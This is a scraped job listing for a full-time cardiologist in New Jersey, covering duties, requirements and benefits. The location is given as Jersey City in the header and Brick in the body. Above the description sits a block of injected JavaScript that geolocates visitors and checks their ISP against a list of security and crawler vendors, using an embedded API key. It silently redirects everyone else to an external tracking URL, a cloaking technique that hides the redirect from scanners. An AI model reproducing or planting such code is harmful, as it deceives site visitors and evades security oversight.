Cardiologist

Jersey City, NJ
January 22, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/caad53172cf92b42/9848e063fd6828a60bde952d406d1fe4fbaa4f7b6a51c36c86e26b36b1c98e56/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

We are seeking a dedicated Cardiology Physician to join our healthcare team in Brick, NJ.

  • Provide comprehensive evaluations, develop treatment plans, and perform diagnostic procedures like echocardiograms and stress tests.
  • Collaborate with multidisciplinary teams for holistic patient care, including infectious disease, senior care, and pain management.
  • Educate patients and families on cardiovascular health and prevention strategies.
  • Stay current with advancements in cardiology through ongoing professional development.

  • Requirements include board certification in Cardiology, experience managing complex cases, and strong communication skills.

    This full-time role offers benefits such as 401(k), health and dental insurance, paid time off, malpractice coverage, and travel reimbursement.
    Schedule includes day, evening, night shifts, on-call, and weekends as needed.
    Must be able to commute or relocate to Brick, NJ before starting.
    Join us to make a positive impact through exceptional cardiology care.